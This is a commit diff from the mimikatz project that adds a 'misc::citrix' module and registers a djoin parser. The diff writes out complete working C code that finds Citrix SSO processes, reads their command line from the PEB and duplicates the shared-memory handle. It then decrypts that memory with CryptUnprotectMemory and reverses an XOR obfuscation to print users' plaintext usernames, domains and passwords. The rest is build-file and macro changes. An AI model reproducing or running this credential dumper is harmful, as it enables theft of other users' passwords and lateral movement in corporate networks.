[legacy] Backport djoin parser & citrix SSO password extractor

gentilkiwi · Sep 19, 2022 · 746e211 · 746e211
1 parent a227123
commit 746e211
Show file tree

Hide file tree

Showing 14 changed files with 1,188 additions and 10 deletions.
diff --git a/inc/globals.h b/inc/globals.h
@@ -129,3 +129,18 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_MIN_BUILD_BLUE	9400
 #define KULL_M_WIN_MIN_BUILD_10		9800
 #define KULL_M_WIN_MIN_BUILD_11		22000
+
+/* mimikatz 3 transition */
+#define GET_CLI_ARG(name, var) (kull_m_string_args_byName(argc, argv, name, var, NULL))
+#define GET_CLI_ARG_DEF(name, var, def) (kull_m_string_args_byName(argc, argv, name, var, def))
+#define GET_CLI_ARG_PRESENT(name) (kull_m_string_args_byName(argc, argv, name, NULL, NULL))
+
+#define kprintf_level(subject, ...)	kprintf(L"%*s" subject, level << 1, L"", __VA_ARGS__)
+
+#define kprinthex(lpData, cbData) kull_m_string_wprintf_hex(lpData, (DWORD) cbData, 0); kprintf(L"\n")
+#define kprinthex16(lpData, cbData) kull_m_string_wprintf_hex(lpData, (DWORD) cbData, 1 | (16 << 16)); kprintf(L"\n")
+
+#define kull_m_cli_guid(pGuid, bNewLine) kull_m_string_displayGUID(pGuid); if(bNewLine) kprintf(L"\n")
+#define kull_m_cli_sid(pSid, bNewLine) kull_m_string_displaySID(pSid); if(bNewLine) kprintf(L"\n")
+
+#define kull_m_crypto_Base64StringToBinary kull_m_string_quick_base64_to_Binary
diff --git a/mimikatz/mimikatz.vcxproj b/mimikatz/mimikatz.vcxproj
@@ -153,6 +153,7 @@
     <ClCompile Include="..\modules\rpc\kull_m_rpc_ms-drsr_c.c" />
     <ClCompile Include="..\modules\rpc\kull_m_rpc_ms-efsr_c.c" />
     <ClCompile Include="..\modules\rpc\kull_m_rpc_ms-nrpc_c.c" />
+    <ClCompile Include="..\modules\rpc\kull_m_rpc_ms-odj.c" />
     <ClCompile Include="..\modules\rpc\kull_m_rpc_ms-pac.c" />
     <ClCompile Include="..\modules\kull_m_service.c" />
     <ClCompile Include="..\modules\kull_m_string.c" />
@@ -213,6 +214,8 @@
     <ClCompile Include="modules\kuhl_m_vault.c" />
     <ClCompile Include="modules\kuhl_m_minesweeper.c" />
     <ClCompile Include="modules\lsadump\kuhl_m_lsadump_dc.c" />
+    <ClCompile Include="modules\misc\kuhl_m_misc_citrix.c" />
+    <ClCompile Include="modules\misc\kuhl_m_misc_djoin.c" />
     <ClCompile Include="modules\ngc\kuhl_m_ngc.c" />
     <ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.c" />
     <ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt6.c" />
@@ -273,6 +276,7 @@
     <ClInclude Include="..\modules\rpc\kull_m_rpc_ms-bkrp.h" />
     <ClInclude Include="..\modules\rpc\kull_m_rpc_ms-efsr.h" />
     <ClInclude Include="..\modules\rpc\kull_m_rpc_ms-nrpc.h" />
+    <ClInclude Include="..\modules\rpc\kull_m_rpc_ms-odj.h" />
     <ClInclude Include="..\modules\rpc\kull_m_rpc_ms-pac.h" />
     <ClInclude Include="..\modules\kull_m_samlib.h" />
     <ClInclude Include="..\modules\kull_m_service.h" />
@@ -331,6 +335,8 @@
     <ClInclude Include="modules\kuhl_m_vault.h" />
     <ClInclude Include="modules\kuhl_m_minesweeper.h" />
     <ClInclude Include="modules\lsadump\kuhl_m_lsadump_dc.h" />
+    <ClInclude Include="modules\misc\kuhl_m_misc_citrix.h" />
+    <ClInclude Include="modules\misc\kuhl_m_misc_djoin.h" />
     <ClInclude Include="modules\ngc\kuhl_m_ngc.h" />
     <ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.h" />
     <ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt6.h" />

diff --git a/mimikatz/mimikatz.vcxproj.filters b/mimikatz/mimikatz.vcxproj.filters
@@ -332,6 +332,15 @@
     <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c">
       <Filter>local modules\dpapi\packages</Filter>
     </ClCompile>
+    <ClCompile Include="..\modules\rpc\kull_m_rpc_ms-odj.c">
+      <Filter>common modules\rpc</Filter>
+    </ClCompile>
+    <ClCompile Include="modules\misc\kuhl_m_misc_djoin.c">
+      <Filter>local modules\misc</Filter>
+    </ClCompile>
+    <ClCompile Include="modules\misc\kuhl_m_misc_citrix.c">
+      <Filter>local modules\misc</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="mimikatz.h" />
@@ -683,6 +692,15 @@
     <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h">
       <Filter>local modules\dpapi\packages</Filter>
     </ClInclude>
+    <ClInclude Include="..\modules\rpc\kull_m_rpc_ms-odj.h">
+      <Filter>common modules\rpc</Filter>
+    </ClInclude>
+    <ClInclude Include="modules\misc\kuhl_m_misc_djoin.h">
+      <Filter>local modules\misc</Filter>
+    </ClInclude>
+    <ClInclude Include="modules\misc\kuhl_m_misc_citrix.h">
+      <Filter>local modules\misc</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <Filter Include="local modules">
@@ -723,6 +741,9 @@
     <Filter Include="local modules\ngc">
       <UniqueIdentifier>{5880e511-0496-4c66-95c3-39c70baac28b}</UniqueIdentifier>
     </Filter>
+    <Filter Include="local modules\misc">
+      <UniqueIdentifier>{ca3b8b78-3db9-40c8-8091-438a90e5be4e}</UniqueIdentifier>
+    </Filter>
   </ItemGroup>
   <ItemGroup>
     <ResourceCompile Include="mimikatz.rc" />

diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c
@@ -30,8 +30,10 @@ const KUHL_M_C kuhl_m_c_misc[] = {
 	{kuhl_m_misc_spooler,	L"spooler",		NULL},
 	{kuhl_m_misc_efs,		L"efs",			NULL},
 	{kuhl_m_misc_printnightmare,	L"printnightmare",		NULL},
-	{kuhl_m_misc_sccm_accounts,	L"sccm",		NULL},
-	{kuhl_m_misc_shadowcopies, L"shadowcopies",	NULL},
+	{kuhl_m_misc_sccm_accounts,	L"sccm",	NULL},
+	{kuhl_m_misc_shadowcopies,	L"shadowcopies",	NULL},
+	{kuhl_m_misc_djoin_proxy,	L"djoin",	NULL},
+	{kuhl_m_misc_citrix_proxy,	L"citrix",	NULL},
 };
 const KUHL_M kuhl_m_misc = {
 	L"misc",	L"Miscellaneous module",	NULL,
@@ -2183,5 +2185,17 @@ NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[])
 	}
 	else PRINT_ERROR(L"NtOpenDirectoryObject: 0x%08x\n", status);
 
+	return STATUS_SUCCESS;
+}
+
+NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[])
+{
+	kuhl_m_misc_djoin(argc, argv);
+	return STATUS_SUCCESS;
+}
+
+NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[])
+{
+	kuhl_m_misc_citrix_logonpasswords(argc, argv);
 	return STATUS_SUCCESS;
 }
diff --git a/mimikatz/modules/kuhl_m_misc.h b/mimikatz/modules/kuhl_m_misc.h
@@ -23,6 +23,8 @@
 #include <sqlext.h>
 #pragma warning(pop)
 #include <sqltypes.h>
+#include "misc/kuhl_m_misc_djoin.h"
+#include "misc/kuhl_m_misc_citrix.h"
 
 const KUHL_M kuhl_m_misc;
 
@@ -50,6 +52,8 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[]);
 
 BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
 BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);

diff --git a/mimikatz/modules/misc/kuhl_m_misc_citrix.c b/mimikatz/modules/misc/kuhl_m_misc_citrix.c
@@ -0,0 +1,168 @@
+/*	Benjamin DELPY `gentilkiwi`
+	https://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kuhl_m_misc_citrix.h"
+
+void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[])
+{
+	UNREFERENCED_PARAMETER(argc);
+	UNREFERENCED_PARAMETER(argv);
+
+	kull_m_process_getProcessInformation(Citrix_Each_SSO_Program, NULL);
+}
+
+DECLARE_CONST_UNICODE_STRING(_U_ssonsvr, L"ssonsvr.exe");
+DECLARE_CONST_UNICODE_STRING(_U_wfcrun32, L"wfcrun32.exe");
+DECLARE_CONST_UNICODE_STRING(_U_AuthManSvr, L"AuthManSvr.exe");
+const PCUNICODE_STRING _U_CITRIX_SSO_PROGRAMS[] = { &_U_ssonsvr , &_U_wfcrun32 , &_U_AuthManSvr };
+BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg)
+{
+	DWORD i, ProcessId;
+	HANDLE hProcess;
+	//PKULL_M_MEMORY_HANDLE hMemory;
+	//KULL_M_MEMORY_ADDRESS aMemory = { NULL, &hMemory };
+	RTL_USER_PROCESS_PARAMETERS UserProcessParameters;
+	KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {&UserProcessParameters, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
+	PEB Peb;
+
+
+	UNREFERENCED_PARAMETER(pvArg);
+
+	for (i = 0; i < ARRAYSIZE(_U_CITRIX_SSO_PROGRAMS); i++)
+	{
+		if (RtlEqualUnicodeString(_U_CITRIX_SSO_PROGRAMS[i], &pSystemProcessInformation->ImageName, TRUE))
+		{
+			ProcessId = PtrToUlong(pSystemProcessInformation->UniqueProcessId);
+			kprintf(L"\n* %wZ -- pid: %u\n", &pSystemProcessInformation->ImageName, ProcessId);
+			hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_DUP_HANDLE, FALSE, ProcessId);
+			if(hProcess)
+			{
+				if (kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &aRemote.hMemory))
+				{
+					if (kull_m_process_peb(aRemote.hMemory, &Peb, FALSE))
+					{
+						aRemote.address = Peb.ProcessParameters;
+						if (kull_m_memory_copy(&aBuffer, &aRemote, sizeof(UserProcessParameters)))
+						{
+							aRemote.address = UserProcessParameters.CommandLine.Buffer;
+							UserProcessParameters.CommandLine.Buffer = LocalAlloc(LPTR, UserProcessParameters.CommandLine.MaximumLength);
+							aBuffer.address = UserProcessParameters.CommandLine.Buffer;
+
+							if(UserProcessParameters.CommandLine.Buffer)
+							{
+								if (kull_m_memory_copy(&aBuffer, &aRemote, UserProcessParameters.CommandLine.MaximumLength))
+								{
+									Citrix_SSO_Program_args(aRemote.hMemory->pHandleProcess->hProcess, &UserProcessParameters.CommandLine);
+								}
+								LocalFree(UserProcessParameters.CommandLine.Buffer);
+							}
+						}
+					}
+					kull_m_memory_close(aRemote.hMemory);
+				}
+				CloseHandle(hProcess);
+			}
+			else PRINT_ERROR_AUTO(L"OpenProcess");
+
+			break;
+		}
+	}
+
+	return TRUE;
+}
+
+void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine)
+{
+	int i, argc;
+	LPWSTR* argv;
+	HANDLE hRemoteFileMapping = NULL;
+
+	argv = CommandLineToArgvW(puCommandLine->Buffer, &argc);
+	if (argv)
+	{
+		if (argc > 0)
+		{
+			for (i = 0; i < argc; i++)
+			{
+				if (_wcsnicmp(argv[i], L"/HTC:", 5) == 0)
+				{
+					hRemoteFileMapping = (HANDLE)(ULONG_PTR)wcstoul(argv[i] + 5, NULL, 10);
+					Citrix_SSO_Program_FileMapping(hRemoteProcess, hRemoteFileMapping);
+
+					break;
+				}
+			}
+
+			if (!hRemoteFileMapping)
+			{
+				kprintf(L"  No shared memory (no SSO enabled?)\n");
+			}
+		}
+		else PRINT_ERROR(L"No command/module?");
+
+		LocalFree(argv);
+	}
+	else PRINT_ERROR_AUTO(L"CommandLineToArgvW");
+}
+
+void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping)
+{
+	HANDLE hFileMapping;
+	PCITRIX_PACKED_CREDENTIALS pCitrixPackedCredentials;
+	PCITRIX_CREDENTIALS pCitrixCredentials;
+
+	if (DuplicateHandle(hRemoteProcess, hRemoteFileMapping, GetCurrentProcess(), &hFileMapping, FILE_MAP_READ, FALSE, 0))
+	{
+		pCitrixPackedCredentials = MapViewOfFile(hFileMapping, FILE_MAP_READ, 0, 0, sizeof(CITRIX_PACKED_CREDENTIALS));
+		if (pCitrixPackedCredentials)
+		{
+			//kprintf(L"cbStruct: 0x%08x - ref: 0x%08x\ncbData  : 0x%08x - ref: 0x%08x\ndwFlags : 0x%08x\n", pCitrixPackedCredentials->cbStruct, sizeof(CITRIX_PACKED_CREDENTIALS), pCitrixPackedCredentials->cbData, sizeof(CITRIX_CREDENTIALS), pCitrixPackedCredentials->dwFlags);
+			pCitrixCredentials = LocalAlloc(LPTR, sizeof(pCitrixPackedCredentials->Data));
+			if (pCitrixCredentials)
+			{
+				RtlCopyMemory(pCitrixCredentials, pCitrixPackedCredentials->Data, sizeof(pCitrixPackedCredentials->Data));
+				if (CryptUnprotectMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data), CRYPTPROTECTMEMORY_CROSS_PROCESS))
+				{
+					CitrixPasswordDesobfuscate((PBYTE)pCitrixCredentials->password, pCitrixCredentials->cbPassword);
+					kprintf(L"| Username  : %s\n| Domain    : %s\n| Password  : %.*s\n| flags/type: 0x%08x\n", pCitrixCredentials->username, pCitrixCredentials->domain, pCitrixCredentials->cbPassword, pCitrixCredentials->password, pCitrixCredentials->dwFlags);
+				}
+				else PRINT_ERROR_AUTO(L"CryptUnprotectMemory");
+
+				LocalFree(pCitrixCredentials);
+			}
+
+			UnmapViewOfFile(pCitrixPackedCredentials);
+		}
+		else PRINT_ERROR_AUTO(L"MapViewOfFile");
+
+		CloseHandle(hFileMapping);
+	}
+	else PRINT_ERROR_AUTO(L"DuplicateHandle");
+}
+
+void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData)
+{
+	DWORD i;
+	BYTE prec;
+
+	for (i = 0, prec = 0x00; i < cbData; i++)
+	{
+		pbData[i] ^= prec ^ 'C';
+		prec = pbData[i];
+	}
+}
+
+void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData)
+{
+	DWORD i;
+	BYTE prec, sprec;
+
+	for (i = 0, prec = 0x00; i < cbData; i++)
+	{
+		sprec = pbData[i];
+		pbData[i] ^= prec ^ 'C';
+		prec = sprec;
+	}
+}
diff --git a/mimikatz/modules/misc/kuhl_m_misc_citrix.h b/mimikatz/modules/misc/kuhl_m_misc_citrix.h
@@ -0,0 +1,37 @@
+/*	Benjamin DELPY `gentilkiwi`
+	https://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "../kuhl_m_misc.h"
+#include "../../../modules/kull_m_memory.h"
+#include "../../../modules/kull_m_process.h"
+
+extern const KUHL_M kuhl_m_misc_citrix;
+
+#pragma pack(push, 4)
+typedef struct _CITRIX_CREDENTIALS {
+	wchar_t username[0x100];
+	wchar_t domain[0x100];
+	DWORD cbPassword;
+	wchar_t password[0x100];
+	DWORD dwFlags; // type ?
+} CITRIX_CREDENTIALS, * PCITRIX_CREDENTIALS;
+
+typedef struct _CITRIX_PACKED_CREDENTIALS {
+	DWORD cbStruct;
+	DWORD cbData;
+	DWORD dwFlags;
+	BYTE Data[SIZE_ALIGN(sizeof(CITRIX_CREDENTIALS), CRYPTPROTECTMEMORY_BLOCK_SIZE)];
+} CITRIX_PACKED_CREDENTIALS, * PCITRIX_PACKED_CREDENTIALS;
+#pragma pack(pop)
+
+void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[]);
+
+BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
+void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine);
+void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping);
+
+void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData);
+void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData);